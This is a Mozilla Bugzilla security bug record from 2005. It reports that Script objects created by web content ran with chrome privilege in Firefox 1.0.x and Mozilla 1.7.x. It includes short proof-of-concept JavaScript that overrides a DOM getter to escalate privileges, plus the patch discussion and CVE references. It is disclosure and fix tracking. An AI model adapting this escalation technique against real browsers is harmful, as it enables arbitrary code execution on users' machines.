Last Comment Bug 289083 - |new Script()| causes arbitrary code execution
: |new Script()| causes arbitrary code execution
Status: RESOLVED FIXED
[sg:fix]
: fixed-aviary1.0.3, fixed1.7.7
Product: Core
Classification: Components
Component: Security (show other bugs)
: Trunk
: x86 Windows XP
: -- normal (vote)
: ---
Assigned To: Daniel Veditz [:dveditz]
:
Mentors:
Depends on: 281988
Blocks: sbb+ 289074 289187
  Show dependency treegraph
 
Reported: 2005-04-05 01:03 PDT by moz_bug_r_a4
Modified: 2007-04-01 14:37 PDT (History)
9 users (show)
brendan: blocking1.7.7+
brendan: blocking‑aviary1.0.3+
bob: in‑testsuite?
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
testcase 1 (357 bytes, text/html)
2005-04-05 01:12 PDT, moz_bug_r_a4
no flags Details
testcase 2 (684 bytes, text/html)
2005-04-05 01:18 PDT, moz_bug_r_a4
no flags Details
testcase 3 (1009 bytes, text/html)
2005-04-05 01:23 PDT, moz_bug_r_a4
no flags Details
Make sure we get the right principals when dealing with JS created Scripts. (5.67 KB, patch)
2005-04-06 01:07 PDT, Johnny Stenback (:jst, jst@mozilla.com)
jst: review+
jst: superreview+
dbaron: approval‑aviary1.0.3+
dbaron: approval1.7.7+
Details | Diff | Splinter Review
Same fix including the comment changes that landed on the aviary branch. (5.69 KB, patch)
2005-04-06 16:31 PDT, Johnny Stenback (:jst, jst@mozilla.com)
no flags Details | Diff | Splinter Review

Description moz_bug_r_a4 2005-04-05 01:03:26 PDT
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319

Even though a |Script Object| is created by a web page, when it is called
from chrome JS, it is executed with chrome privilege.

If a web page redefines |localName getter| of a DOM node, such as following.

  document.body.__defineGetter__("localName", function() {
    return { toLowerCase : new Script("alert(Components.stack);") };
  });

Then, if there is a code such as the following code in chrome JS,
"alert(Components.stack);" will be executed with chrome privilege.

  local_name = event.target.localName.toLowerCase();

In addition, |typeof new Script()| is "function" in Firefox1.0.2 and
Mozilla1.7.6 (it is "object" in latest-trunk), thus, it is easier to write a
exploit code, such as following.

  document.body.__defineGetter__("localName", new
Script("alert(Components.stack);"));

And an attacker can exploit *without* user interaction, by using DOMLinkAdded Event.


I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404
Firefox/1.0+
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404


Reproducible: Always

Steps to Reproduce:
Comment 1 moz_bug_r_a4 2005-04-05 01:12:36 PDT
Created attachment 179682 [details]
testcase 1

this requires user's click action.
Comment 2 moz_bug_r_a4 2005-04-05 01:18:28 PDT
Created attachment 179683 [details]
testcase 2

this does not need user interaction.

for Firefox/1.0.2, Firefox/1.0.3, Mozilla 1.7.6, Mozilla 1.7.7
Comment 3 moz_bug_r_a4 2005-04-05 01:23:54 PDT
Created attachment 179684 [details]
testcase 3

this does not need user interaction.

for Firefox 1.0+, Mozilla 1.8b
Comment 4 Johnny Stenback (:jst, jst@mozilla.com) 2005-04-06 01:07:05 PDT
Created attachment 179827 [details] [diff] [review]
Make sure we get the right principals when dealing with JS created Scripts.

This fixes this by ensuring that we don't give elevated priveleges to content
code in a Script when called from chrome. r+sr=brendan (in person).
Comment 5 Johnny Stenback (:jst, jst@mozilla.com) 2005-04-06 01:09:33 PDT
Fix landed for 1.0.3.
Comment 6 Brendan Eich [:brendan] 2005-04-06 11:04:41 PDT
Wanted in 1.7 branch and trunk, of course.

/be
Comment 7 Daniel Veditz [:dveditz] 2005-04-06 15:43:48 PDT
Comment on attachment 179827 [details] [diff] [review]
Make sure we get the right principals when dealing with JS created Scripts.

r=dveditz fwiw, though fix the missing apostrophes in the comment block.
Comment 8 Daniel Veditz [:dveditz] 2005-04-06 15:46:43 PDT
Original testcases fixed by this patch, but see bug 289074 comment 13 and the
testcase in attachment 179875 [details]
Comment 9 Johnny Stenback (:jst, jst@mozilla.com) 2005-04-06 16:31:15 PDT
Created attachment 179895 [details] [diff] [review]
Same fix including the comment changes that landed on the aviary branch.
Comment 10 Asa Dotzler [:asa] 2005-04-17 11:34:39 PDT
This still needs to land on the trunk? a=asa for trunk landing if it's simply
migrating the same patch to the trunk. Is there anything else that's needed here?
Comment 11 Asa Dotzler [:asa] 2005-04-26 15:37:02 PDT
dan says bug 281988 superceedes this. unblocking 1.8b2.
Comment 12 Juha-Matti Laurio 2005-04-29 09:48:52 PDT
This was assigned as SA14938's vulnerability #8;
http://secunia.com/advisories/14938/ and as
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1160 .
Comment 13 Juha-Matti Laurio 2005-04-29 09:51:53 PDT
Additionally, this is one of April's (i.e. 1.0.3) MFSA's classified as 'Critical':
http://www.mozilla.org/security/announce/mfsa2005-41.html
Comment 14 Daniel Veditz [:dveditz] 2005-05-17 16:21:52 PDT
This has been landed on the trunk as part of bug 281988. Although parts of
281988 have been backed out, this much remains.

Note You need to log in before you can comment on or make changes to this bug.